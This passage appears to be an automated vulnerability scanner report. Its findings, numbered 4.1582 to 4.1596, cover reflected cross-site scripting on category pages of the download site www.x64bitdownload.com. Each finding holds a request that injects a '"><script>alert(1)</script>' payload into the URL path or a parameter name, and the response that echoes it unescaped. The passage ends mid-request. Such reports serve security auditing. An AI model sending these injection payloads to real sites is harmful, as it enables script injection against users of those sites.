GET /64-bit-par-downloads.htmld0759"><script>alert(1)</script>6fd3ce475e7 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-par-downloads.htmld0759"><script>alert(1)</script>6fd3ce475e7" />
...[SNIP]...

4.1582. http://www.x64bitdownload.com/64-bit-par-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-par-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c878"><script>alert(1)</script>7559f64c803 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-par-downloads.html?8c878"><script>alert(1)</script>7559f64c803=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:45 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-par-downloads.html?8c878"><script>alert(1)</script>7559f64c803=1" />
...[SNIP]...

4.1583. http://www.x64bitdownload.com/64-bit-podcast-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-podcast-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7970"><script>alert(1)</script>88378e0e2f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-podcast-downloads.htmld7970"><script>alert(1)</script>88378e0e2f5 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91550


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-podcast-downloads.htmld7970"><script>alert(1)</script>88378e0e2f5" />
...[SNIP]...

4.1584. http://www.x64bitdownload.com/64-bit-podcast-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-podcast-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4622"><script>alert(1)</script>bdc4521abda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-podcast-downloads.html?a4622"><script>alert(1)</script>bdc4521abda=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22podcast%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-podcast-downloads.html?a4622"><script>alert(1)</script>bdc4521abda=1" />
...[SNIP]...

4.1585. http://www.x64bitdownload.com/64-bit-rar-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rar-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96b2e"><script>alert(1)</script>6e0959531ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rar-downloads.html96b2e"><script>alert(1)</script>6e0959531ff HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rar-downloads.html96b2e"><script>alert(1)</script>6e0959531ff" />
...[SNIP]...

4.1586. http://www.x64bitdownload.com/64-bit-rar-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rar-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e87e"><script>alert(1)</script>7391c84ac49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rar-downloads.html?7e87e"><script>alert(1)</script>7391c84ac49=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:11 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rar%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rar-downloads.html?7e87e"><script>alert(1)</script>7391c84ac49=1" />
...[SNIP]...

4.1587. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf657"><script>alert(1)</script>ba7bde42ab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.htmlcf657"><script>alert(1)</script>ba7bde42ab HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:14 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45377


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-c-44-newsgroup-clients-downloads.htmlcf657"><script>alert(1)</script>ba7bde42ab" />
...[SNIP]...

4.1588. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce3f"><script>alert(1)</script>fad1e3471a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-c-44-newsgroup-clients-downloads.html?2ce3f"><script>alert(1)</script>fad1e3471a2=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:09 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45381


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-c-44-newsgroup-clients-downloads.html?2ce3f"><script>alert(1)</script>fad1e3471a2=1" />
...[SNIP]...

4.1589. http://www.x64bitdownload.com/64-bit-reader-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebc2d"><script>alert(1)</script>fcd3dfde6f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-downloads.htmlebc2d"><script>alert(1)</script>fcd3dfde6f3 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-downloads.htmlebc2d"><script>alert(1)</script>fcd3dfde6f3" />
...[SNIP]...

4.1590. http://www.x64bitdownload.com/64-bit-reader-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14914"><script>alert(1)</script>113a0fba4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reader-downloads.html?14914"><script>alert(1)</script>113a0fba4f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98251


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reader-downloads.html?14914"><script>alert(1)</script>113a0fba4f=1" />
...[SNIP]...

4.1591. http://www.x64bitdownload.com/64-bit-reading-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reading-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cf3"><script>alert(1)</script>15bec155853 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reading-downloads.html32cf3"><script>alert(1)</script>15bec155853 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reading-downloads.html32cf3"><script>alert(1)</script>15bec155853" />
...[SNIP]...

4.1592. http://www.x64bitdownload.com/64-bit-reading-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-reading-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0f20"><script>alert(1)</script>c2ca189390f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-reading-downloads.html?a0f20"><script>alert(1)</script>c2ca189390f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:51 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22reading%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-reading-downloads.html?a0f20"><script>alert(1)</script>c2ca189390f=1" />
...[SNIP]...

4.1593. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fff5d"><script>alert(1)</script>01c8f498ee9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.htmlfff5d"><script>alert(1)</script>01c8f498ee9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-c-44-newsgroup-clients-downloads.htmlfff5d"><script>alert(1)</script>01c8f498ee9" />
...[SNIP]...

4.1594. http://www.x64bitdownload.com/64-bit-rss-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a440d"><script>alert(1)</script>265b1c4833d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-c-44-newsgroup-clients-downloads.html?a440d"><script>alert(1)</script>265b1c4833d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:23 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22rss%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22rss%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-c-44-newsgroup-clients-downloads.html?a440d"><script>alert(1)</script>265b1c4833d=1" />
...[SNIP]...

4.1595. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-client-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1c3"><script>alert(1)</script>79bc88e940 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-client-downloads.html6f1c3"><script>alert(1)</script>79bc88e940 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22rss-client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22rss+client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92276


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-rss-client-downloads.html6f1c3"><script>alert(1)</script>79bc88e940" />
...[SNIP]...

4.1596. http://www.x64bitdownload.com/64-bit-rss-client-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-rss-client-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3709f"><script>alert(1)</script>5d317c2536e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-rss-client-downloads.html?3709f"><script>alert(1)</script>5d317c2536e=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
